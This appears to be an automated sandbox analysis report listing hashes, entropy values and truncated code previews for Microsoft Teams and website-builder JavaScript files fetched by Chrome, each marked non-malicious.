                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (55911)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):56038
                                                                                                                                                                                                                          Entropy (8bit):5.393720302305123
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:Z7ZXRRWXosAEKPe1ndtR1493c1cu9uI0+qZEyHDVeq1MuBDilTek6cjzp6Og/Rmb:lxRardvQUcu9pXaQZT8pS2N+Ip6KI
                                                                                                                                                                                                                          MD5:47AE6B51B036DCBD0E307F8DFCB18EA8
                                                                                                                                                                                                                          SHA1:23EBFEFC3E8C38529466DA1ECC72E501D8D03D72
                                                                                                                                                                                                                          SHA-256:F0602A7D2715902B437AA80C3F44240C0A5FD0ECCECABC77A5C14AD37A97D8F8
                                                                                                                                                                                                                          SHA-512:EE5E76FA0F046A21D84EE7AB40EAF98BBFFBBE1A59701FDFBB84B39AC4BB8073F816CA6C6E15AF84B9B57F6B660624554C4AA6098E6DB40211D9C964FE4762D5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[17387],{48977:(e,t,r)=>{r.d(t,{X:()=>o,K:()=>a});var i=r(554186);const n="\r\n",s="ump=1",o=e=>async t=>e(a(t)),a=e=>{const t=(0,i.v4)();return{...e,url:l(e.url),headers:{"Content-Type":`multipart/form-data;boundary=${t}`},body:c(e,t),method:"POST"}},l=e=>e.match(/[?]/)?`${e}&${s}`:`${e}?${s}`,c=(e,t)=>{const r=`--${t}${n}`,i=`--${t}--`,s=`Content-Disposition: form-data;name=data${n}`,o=`Content-Type: application/json${n}`,a="POST"!==e.method?`X-HTTP-Method-Override: ${e.method}${n}`:"",l=h(e),c=e.body?`${e.body}${n}`:`{}${n}`;return`${r}${s}${o}${l}${a}${n}${c}${i}`},h=e=>{const t=e.headers;return t?Object.keys(t).map((e=>"Content-Type"===e?"":`${e}: ${t[e]}${n}`)).join(""):""}},34117:(e,t,r)=>{r.r(t),r.d(t,{DriveItemShareService:()=>qe,FileContentService:()=>ke,FileMetadataService:()=>xe,FileRedeemAPIContext:()=>ce.o1,FileRedeemAPIHeaderPreferOptions:()=>ce.gl,FileRedeemMul
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14104)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):14212
                                                                                                                                                                                                                          Entropy (8bit):4.793888724643343
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:jjqz7w2M3hbxUTViE/G5qVQY61phMH3LDZiGhRpldoWOhq0QEQSTf9+P:j2AXhVUTViE/G5qVQYkpaBT/on8bSL9g
                                                                                                                                                                                                                          MD5:C779A3CD7F261EFEA6776C15C84F5548
                                                                                                                                                                                                                          SHA1:C330D22070332B3DAB44F90167FA26F32D5F56CF
                                                                                                                                                                                                                          SHA-256:39B145AA7B80DB2B82502A5237A71CE7AD23F6A24F316819765CF6CAE41C4F97
                                                                                                                                                                                                                          SHA-512:F9D89DBFBB56766357ED4374490AD7901022E54B9444376C492B38CA288824A5DD2273D38B01F12C7C8809E1C1F02E7F671888A674F761FF0668FFDEE038DC53
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/725591-f9265ef9f2d4e54e.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[725591],{852774:(a,e,l)=>{l.d(e,{MHj:()=>c,nDI:()=>M,Vjr:()=>r,Fm4:()=>n,S61:()=>A,SH1:()=>s,W5L:()=>u,jz7:()=>t,lwq:()=>U,V$h:()=>i,qvE:()=>P,qXC:()=>L,_E3:()=>h,uO1:()=>v,yQ7:()=>m,gNt:()=>d,Vo$:()=>g,HkI:()=>R,jcT:()=>o,TTi:()=>f,NUA:()=>V,fGI:()=>H,B2S:()=>F,Ndk:()=>y,grK:()=>w,qSk:()=>b,DWd:()=>k,Z4e:()=>O,TNE:()=>C,mx_:()=>D,U$D:()=>S,gC_:()=>_,ORW:()=>B,vsS:()=>$,F$H:()=>p,xmy:()=>q,hmO:()=>x,X8c:()=>E,fPq:()=>I,dR_:()=>j,MxQ:()=>N,KCz:()=>Q,y3Y:()=>T,gNc:()=>z,uOK:()=>G,X0b:()=>K,PM$:()=>W,nPn:()=>X,lYg:()=>Y,omG:()=>J,xo$:()=>aa,$Oq:()=>ea,b8q:()=>la,ADj:()=>Za,tOz:()=>ca,Vvl:()=>Ma,w8$:()=>ra,$xG:()=>na,Uhh:()=>Aa,It2:()=>sa});var Z=l(693935);const c=(0,Z.U)("PersonVoice20Regular","20",["M17.13 1.06a.5.5 0 0 1 .68.2 9.96 9.96 0 0 1 0 9.48.5.5 0 1 1-.88-.48 8.96 8.96 0 0 0 0-8.52.5.5 0 0 1 .2-.68Zm-2.32 1.97a.5.5 0 0 1 .65.27 6.98 6.98 0 0 1 0 5.4.5.5 0 1 1-.92-.39 5
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):208882
                                                                                                                                                                                                                          Entropy (8bit):5.35092580985546
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:tpC1VTrKhZ/SiPohOt5UGFSY4huKlnFSdfdUPTq:3CT2Z/SiPohOtyGFWTq
                                                                                                                                                                                                                          MD5:058DD2C0C1F21160A5137E4364BAA2CF
                                                                                                                                                                                                                          SHA1:5397149EDB8E65B94E1041029BD27D5EC5294E07
                                                                                                                                                                                                                          SHA-256:0D850B0C8DB4F269A622F815B55045702BF26748CD4540EDC136291F7F288E11
                                                                                                                                                                                                                          SHA-512:92126053FB9CE7B62604A452348D604012FD8124D1F450D9E501C896586651B066FFD7B242B5FFEB225D52B4745AD1DD0C97F9C039B55DB025994C5FDEF14341
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/2333-afd67534d2d2fc7e.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[2333],{923226:(e,t,n)=>{var i,a,s,r,o;n.d(t,{IO:()=>i,Wx:()=>a,$b:()=>s,BV:()=>r,fP:()=>o,lV:()=>d,p$:()=>l}),function(e){e.POP="pop",e.BEARER="Bearer"}(i||(i={})),function(e){e[e.Skype=0]="Skype",e[e.AAD=1]="AAD",e[e.CAE=2]="CAE"}(a||(a={})),function(e){e[e.Error=0]="Error",e[e.Warning=1]="Warning",e[e.Info=2]="Info",e[e.Verbose=3]="Verbose"}(s||(s={})),function(e){e.ag08="ag08",e.ag09="ag09",e.dod="dod",e.gcc="gcc",e.gcchigh="gcchigh",e.life="life",e.prod="prod"}(r||(r={})),function(e){e.LOKI_TFL_AUTH_TOKEN_AUDIENCE="liveprofilecard.access",e.MT="https://api.spaces.skype.com",e.GROUPS_SERVICE="https://groupssvc.fl.teams.microsoft.com/teams.readwrite",e.AAD_V2_TFL="https://mtsvc.fl.teams.microsoft.com/teams.mt.readwrite",e.UNIFIED_CONSENT_WEB_AUTH_URL="https://consentservice.microsoft.com/web/UnifiedUserConsent.ReadWrite",e.UNIFIED_CONSENT_CHECKIN_AUTH_URL="https://consentse
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5570)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):5678
                                                                                                                                                                                                                          Entropy (8bit):5.412429152356154
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:N2y+zXTgXS4IvFM3pwRY4XCcO+Luj20gwceo1zf/ArJPawBXj/kb+DE:NgEi4ItM3pmEcOQuzx4f/AVXYKDE
                                                                                                                                                                                                                          MD5:29ACBE811F209B39A435C7D0FF3CC186
                                                                                                                                                                                                                          SHA1:541A19A018AA0D425A4958054BD5EC6B66749E60
                                                                                                                                                                                                                          SHA-256:BB44554D718C31BA72F43929903CE73E8093406C59658C00EFE2F80F70D498E0
                                                                                                                                                                                                                          SHA-512:E13F6E954CF561E68E4F3D89D1AD662CBD1D406AFA4D216A118109FD5403BB98D1C7D712E10FD8D366A122719F62F7DDCA722C71120EB3A1018C60F87713CFAC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/816373-105b523bdd46a179.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[816373],{752705:function(t,n,e){!function(r,i){{const r=(o=o||function(t,n){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==e.g&&e.g.crypto&&(r=e.g.crypto),!r)try{r=e(475443)}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")},o=Object.create||function(){function t(){}return function(n){var e;return t.prototype=n,e=new t,t.prototype=null,e}}(),s={},a=s.lib={},c=a.Base={extend:function(t){var n=o(this);retu
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):316772
                                                                                                                                                                                                                          Entropy (8bit):5.2685331692118
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:bb+wOOWkWbzpCta0J3ql3yn5nSnF7HnhWiuI:bbmwt/J3eGOBWiH
                                                                                                                                                                                                                          MD5:41CDABB830F5F89F27FBC9B4F45199A1
                                                                                                                                                                                                                          SHA1:CD8285679839EEBB097195CE6F317DF45CA26B87
                                                                                                                                                                                                                          SHA-256:D6BA3EC81CCBA0CD416AB45DCC83B52DE49C6FAE0B43434D6F7EA3A7FCACEE30
                                                                                                                                                                                                                          SHA-512:1CA9941F26893FE2047D8194B4DBC33EAB61BAC9D19C65014C9ACB61358C03E2E8F7C538D45AB0F52A2078E7A86FB41BC80E1437AA87B365BC50E87329B807BA
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/865969-b2c9db756cacf6bd.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[865969],{407845:(e,t,r)=>{r.d(t,{vq:()=>c,Ji:()=>d,q8:()=>l});var n=r(514181),o=r(538906),i=r(145353),a=r(789389),s=r(543678);class c{static async createPublicClientApplication(e){const t=await(0,n.K)(e);return new c(e,t)}constructor(e,t){this.controller=t||new o.i(new i.A(e))}async initialize(e){return this.controller.initialize(e)}async acquireTokenPopup(e){return this.controller.acquireTokenPopup(e)}acquireTokenRedirect(e){return this.controller.acquireTokenRedirect(e)}acquireTokenSilent(e){return this.controller.acquireTokenSilent(e)}acquireTokenByCode(e){return this.controller.acquireTokenByCode(e)}addEventCallback(e,t){return this.controller.addEventCallback(e,t)}removeEventCallback(e){return this.controller.removeEventCallback(e)}addPerformanceCallback(e){return this.controller.addPerformanceCallback(e)}removePerformanceCallback(e){return this.controller.removePerforma
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (20845)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):20952
                                                                                                                                                                                                                          Entropy (8bit):5.312655616899363
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:Xvr3TLvGAkYt54AlLR3Rr6yRZvS1RdWspv8CHSIJ+t4l1:XvPrRT+z
                                                                                                                                                                                                                          MD5:0DA43D7DD5D49C8E50684556326AEEA6
                                                                                                                                                                                                                          SHA1:8308F2C481046EE86F6FA114948131B82E841F98
                                                                                                                                                                                                                          SHA-256:BF86140F152FCCF6763F7B46B18E7F78D2FDFD6B18FD6684E741E0104C415F61
                                                                                                                                                                                                                          SHA-512:B8EA54E4C46839E8AB211D4562296C06F7540AE463C33A2F510F6851DED718553F4EF4C2733E2D6572943828439B7AF3EF4A7705D67C071DB1EC2AE60DC477D1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/94139-a0e97f9184666b52.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[94139],{214238:(t,e,r)=>{function n(t,e){if(null==t)throw new TypeError("assign requires that input parameter not be null or undefined");for(var r in e=e||{})Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r]);return t}r.d(e,{A:()=>n})},94139:(t,e,r)=>{r.d(e,{A:()=>ot});var n=r(864627),a=r(798202),i=r(805247),o=r(214238),u=r(489176),s=r(997464),c=r(896825),d=r(650616),l=r(336116),f=r(425179);function w(t,e,r){(0,f.A)(2,arguments);var n=r||{},a=n.locale,o=a&&a.options&&a.options.weekStartsOn,u=null==o?0:(0,d.A)(o),s=null==n.weekStartsOn?u:(0,d.A)(n.weekStartsOn);if(!(s>=0&&s<=6))throw new RangeError("weekStartsOn must be between 0 and 6 inclusively");var c=(0,i.A)(t),l=(0,d.A)(e),w=((l%7+7)%7<s?7:0)+l-c.getUTCDay();return c.setUTCDate(c.getUTCDate()+w),c}var h=r(315391);var m=r(534711);var b=r(510327),T=r(715394),p=/^(1[0-2]|0?\d)/,y=/^(3[0-1]|[0-2]?\d)/,g=/^(36[0-6]|3[0-5]
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (47016)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):47124
                                                                                                                                                                                                                          Entropy (8bit):5.288745142117651
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:kCVHH8encpTYeGq1q0V0UDA8MnSj5udSTYSzPz2:bH8enclYpmJV5DA8MnSj5udgYYa
                                                                                                                                                                                                                          MD5:F6D80FCD9D1F9EAFB54E2B26C2A1BE5A
                                                                                                                                                                                                                          SHA1:ACF87FC3F2AF50DDCF4FCABB5BCDC8DAE6E878D3
                                                                                                                                                                                                                          SHA-256:511C92C1498EE0E4576F214C41C7499DD9B8A2CB94DF79934A48F0707B3B1AED
                                                                                                                                                                                                                          SHA-512:A1BBF2851B958F5F398EBBEB2629607E63DA99A7849628657CC70F9855827A56E53E98C55AF6F041AE3B0E71DB6ABA6E4066712B5D93DDD903F5CC6275AA425A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/985157-23a375d8f9446453.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[985157],{943015:(e,t,r)=>{"use strict";function n(e,t){var r="undefined"!=typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(r)return(r=r.call(e)).next.bind(r);if(Array.isArray(e)||(r=function(e,t){if(!e)return;if("string"==typeof e)return i(e,t);var r=Object.prototype.toString.call(e).slice(8,-1);"Object"===r&&e.constructor&&(r=e.constructor.name);if("Map"===r||"Set"===r)return Array.from(e);if("Arguments"===r||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(r))return i(e,t)}(e))||t&&e&&"number"==typeof e.length){r&&(e=r);var n=0;return function(){return n>=e.length?{done:!0}:{done:!1,value:e[n++]}}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function i(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r];return n}function o(e,t){for(var r=0
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4451)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):4507
                                                                                                                                                                                                                          Entropy (8bit):5.2603834356899455
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:UQ9n5gyM/BOcyATOjov9o8sKoyOFOCBj+ycWVNqM1q6zqqe0q7dOdQdndqpqJd/X:dGlpvyATOkv9o8poyqL53cWVJwbE6d7P
                                                                                                                                                                                                                          MD5:7E8957E798608B7835B0681550C5AD10
                                                                                                                                                                                                                          SHA1:51C7EBE582DAC764DB4C1AFAA95A62EAC9261F05
                                                                                                                                                                                                                          SHA-256:FAEC63FA9BF35E462C000E650B53D7569FCABE5BA8190B27D2A4B7D25B394EEF
                                                                                                                                                                                                                          SHA-512:44C8DA46DAEB972EE81597079F394E6AB88255F401CF7417EC3A14D7671F8ADE20C1667E63EF892F6CA4D644A400C04FF7C6014DD9926B10EC1BD4034CFFD0D4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/lib/components/DynamicFontScaler-6cccd626.js",["exports","~/c/_rollupPluginBabelHelpers","~/c/dynamicFontScaler"],(function(t,e,n){"use strict";function o(t){let e,{containerId:n,targetId:o,fontSizes:r,maxLines:i,prioritizeDefault:s}=t;if("undefined"==typeof document)return;const a=document.getElementById(n),c=document.getElementById(o);function l(t){return function(t){const e=parseInt(y(t,"padding-left")||0,10),n=parseInt(y(t,"padding-right")||0,10);return t.scrollWidth+e+n}(t)<=a.clientWidth&&function(t){const e=t.offsetHeight,n=parseInt(y(t,"line-height"),10)||1;return Math.floor(e/n)}(t)<=i}function p(t){return parseInt(y(t,"font-size")||0,10)}function d(t){if(1===t.length)return t[0];const e=t.filter(l);if(1===e.length)return e[0];if(!e.length)return function(t){return t.sort(((t,e)=>p(t)-p(e)))[0]}(t);return e.sort(((t,e)=>p(e)-p(t)))[0]}function u(){if(!a||!c||e===window.innerWidth)return;if(c.hasAttribute("data-font-scaled"))return void g();e=win
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (56471)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):66708
                                                                                                                                                                                                                          Entropy (8bit):5.345935562300363
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:RfLoCGFoLS8vvw4xUC/ib7V/Kc5Wd1PuctAINM0GEXOumJ66Kz3pzN/R5HbgI:FN1ZthMG+umJ66KzZJ/R5Hbr
                                                                                                                                                                                                                          MD5:6A67ACFF1A3F4E2A54532B3CC2B918B5
                                                                                                                                                                                                                          SHA1:D23DD0FA34A6A20FFBBC37E02EB01C732CDACE78
                                                                                                                                                                                                                          SHA-256:BFE62365CA52C27C8606936F747299EB61D61714C367A5750B03809CB69EEA8D
                                                                                                                                                                                                                          SHA-512:E833FE1B5E1D36FD0F38E81C6C35948DA9798A675142C900BCCE58346B5C7A81ACBC9E0BB865CB218F4470A9C3F33A0321993384AD81F70276E95EFBDDEAF326
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/f987ee28-0d2d-4d49-bb11-834c1995f8b3/gpub/ce6f2c52bf7ddc48/script.js
                                                                                                                                                                                                                          Preview:navigator&&navigator.connection&&(window.networkInfo=navigator.connection,navigator.connection.addEventListener&&navigator.connection.addEventListener("change",({target:n})=>window.networkInfo=n));.const imageObserver=new IntersectionObserver((e,r)=>{var a=e=>{if(e.hasAttribute("data-lazyimg")){var t=e.getAttribute("data-srclazy");let o=e.getAttribute("data-srcsetlazy")||"";if(t&&(e.src=t),o&&window.networkInfo){var n=window.networkInfo.downlink;const r=[{min:0,max:5,regex:/(.*?(?=, ))/,qMod:!0},{min:5,max:8,regex:/(.*2x)/}];r.forEach(({min:e,max:t,regex:r,qMod:a})=>{e<=n&&n<t&&(r=o.match(r),o=(r&&r.length?r[0]:o)+(a?"/qt=q:"+Math.round((n-e)/(t-e)*100):""))})}e.srcset=o,e.removeAttribute("sizes"),e.removeAttribute("data-lazyimg"),e.removeAttribute("data-srclazy"),e.removeAttribute("data-srcsetlazy")}};e.forEach(e=>{if(e.isIntersecting){const t=e.target;window.networkInfo&&0===window.networkInfo.downlink||([t].concat(Array.from(t.querySelectorAll("[data-lazyimg]"))).forEach(a),r.unobse
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (37256)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):37364
                                                                                                                                                                                                                          Entropy (8bit):5.170958810990217
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:BgwG2MtRs/YW7+g5UBj74DvpttZwJbhTJrSK4VxjPHRYOI+AmOkmMOkxp+hg8XFw:UHaYWSg57DvpttZwJbhTJrSK4VxjPHRp
                                                                                                                                                                                                                          MD5:52534697E120336121D1A6AAC1B71E1F
                                                                                                                                                                                                                          SHA1:6E1D1AE84312C249D20F0E215028564CE2DE987A
                                                                                                                                                                                                                          SHA-256:6EDEF2224A589C15EA4E9964C7E419F8FE8DA1492F7A9E0119F55486E10E62D2
                                                                                                                                                                                                                          SHA-512:D3FDDB3E2724B73063249F6DFC96FC0DFC030D4EB696B15CDD1C8A861024489F80E6BE4A82DC86F1109C1CB2D7FA62CBF6BB6307B06ED246A85042CCC93D2C4F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[918681],{48374:(r,o,e)=>{e.d(o,{vqc:()=>a,xyI:()=>l,$xS:()=>t,ozo:()=>c,yd$:()=>n,nkM:()=>d,Qpb:()=>u,DoI:()=>g,oam:()=>v,ww0:()=>B,e5x:()=>i,j0c:()=>s,Er0:()=>k,epd:()=>f,uf9:()=>P});const a="Shift",l="Enter",t=" ",c="Tab",n="ArrowDown",d="ArrowLeft",u="ArrowRight",g="ArrowUp",v="End",B="Home",i="PageDown",s="PageUp",k="Backspace",f="Delete",P="Escape"},188206:(r,o,e)=>{e.d(o,{F:()=>t});var a=e(48374),l=e(602835);e(513432);function t(r,o){const{disabled:e,disabledFocusable:t=!1,"aria-disabled":c,onClick:n,onKeyDown:d,onKeyUp:u,...g}=null!=o?o:{},v="string"==typeof c?"true"===c:c,B=e||t||v,i=(0,l.D)((r=>{B?(r.preventDefault(),r.stopPropagation()):null==n||n(r)})),s=(0,l.D)((r=>{if(null==d||d(r),r.isDefaultPrevented())return;const o=r.key;if(B&&(o===a.xyI||o===a.$xS))return r.preventDefault(),void r.stopPropagation();o!==a.$xS?o===a.xyI&&(r.preventDefault(),r.currentTarget.cli
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (27440)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):27548
                                                                                                                                                                                                                          Entropy (8bit):5.276558233916037
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:4zEhQ+dP4/T1f0FE0/9wQsry3HFpNKD2jlVHm09St/d6ruCzL2Mli3:oEhQcoCzLE
                                                                                                                                                                                                                          MD5:E5C8794E3EFF94D66DFA98E07E6AD2A0
                                                                                                                                                                                                                          SHA1:906B6E540FEE1049A87749643D40A7BF8C70BE5E
                                                                                                                                                                                                                          SHA-256:965858E2CE33018A3D630ABFCE455CD4F9C5D5E8EF36F3C53E9C962706158097
                                                                                                                                                                                                                          SHA-512:69A3D69997BC3D0CBB5244235390C79124E9DB42A334850B0B2F90D682BFDC4E6C405F3655E1756A6A59678A0073EC8D86A0A330C56D592E22C58143182416B4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[387552],{28932:(e,t,n)=>{n.d(t,{x:()=>i});const i={0:"OngoingCall",OngoingCall:0,1:"Meeting",Meeting:1,2:"OneToOneCall",OneToOneCall:2,3:"GroupCall",GroupCall:3,4:"AgentMonitorSession",AgentMonitorSession:4}},588534:(e,t,n)=>{var i;n.d(t,{R:()=>i}),function(e){e.ReplyChain="ReplyChain",e.CallHistory="CallHistory",e.CallHistoryDoubleClick="CallHistoryDoubleClick",e.ContactsTab="ContactsTab",e.Dialpad="Dialpad",e.DialpadWithPeoplePicker="DialpadWithPeoplePicker",e.ExchangeContactsTab="ExchangeContactsTab",e.EchoBotCall="EchoBotCall",e.Voicemail="Voicemail",e.RetryCall="RetryCall",e.RejoinCall="RejoinCall",e.RetryCallFromChildWindow="RetryCallFromChildWindow",e.RejoinCallFromChildWindow="RejoinCallFromChildWindow",e.CallingAnonMeetingEndScreen="CallingAnonMeetingEndScreen",e.HIDTriggered="HIDTriggered",e.HIDTriggeredAccept="hidtriggered_accept",e.HIDTriggeredVoipAccept="hidtrigg
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14632)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):14740
                                                                                                                                                                                                                          Entropy (8bit):5.4039958808547786
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:7yxZGphPpPVHt9xq+JrcVQ2H+dh6R02te8zXP26T8t2cO8T5m0fN6mdD57h+OR0R:7yxZGnP3t9xqCr+Q76RRN/2Zt2c7gmsr
                                                                                                                                                                                                                          MD5:4020AC6F830FB33A2B29E89DB059B4C0
                                                                                                                                                                                                                          SHA1:2AE741E32C09DD84BCBA604C82393B3362C6E32C
                                                                                                                                                                                                                          SHA-256:F4847442D93F5B9D87C8D54F46E957A0E59AEC8A0E88181767E8894A96BC6F2B
                                                                                                                                                                                                                          SHA-512:36903165D20453C280C7E51667818806F8EF7A8CD326148CD8B1F8F1DDC79A802CC0B66FE9553015AA2E606D5E09017DA5367161D9D182548C70A6E84DCF4F16
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[574626],{690784:(t,r,e)=>{var o=e(212218)(e(587809),"DataView");t.exports=o},180345:(t,r,e)=>{var o=e(807732),n=e(968386),a=e(2909),s=e(458865),i=e(87225);function c(t){var r=-1,e=null==t?0:t.length;for(this.clear();++r<e;){var o=t[r];this.set(o[0],o[1])}}c.prototype.clear=o,c.prototype.delete=n,c.prototype.get=a,c.prototype.has=s,c.prototype.set=i,t.exports=c},796779:(t,r,e)=>{var o=e(189546),n=e(398316),a=e(902719),s=e(631683),i=e(577051);function c(t){var r=-1,e=null==t?0:t.length;for(this.clear();++r<e;){var o=t[r];this.set(o[0],o[1])}}c.prototype.clear=o,c.prototype.delete=n,c.prototype.get=a,c.prototype.has=s,c.prototype.set=i,t.exports=c},342587:(t,r,e)=>{var o=e(212218)(e(587809),"Map");t.exports=o},525801:(t,r,e)=>{var o=e(678436),n=e(603154),a=e(687181),s=e(328929),i=e(247241);function c(t){var r=-1,e=null==t?0:t.length;for(this.clear();++r<e;){var o=t[r];this.set(o[0],o[1])}}c.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14466), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):14466
                                                                                                                                                                                                                          Entropy (8bit):5.325793887878328
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:UBv1+1sirzkTt/Ta1sirzNjdR1sirzrgFXhFh76cQJ:UBv16ToThqTJlTfgFXhFh76cQJ
                                                                                                                                                                                                                          MD5:79BE1DC904872919ED0832EB24DAC09F
                                                                                                                                                                                                                          SHA1:48EBA2141FBC6B51737BC6091C4C8C6C8BC755B5
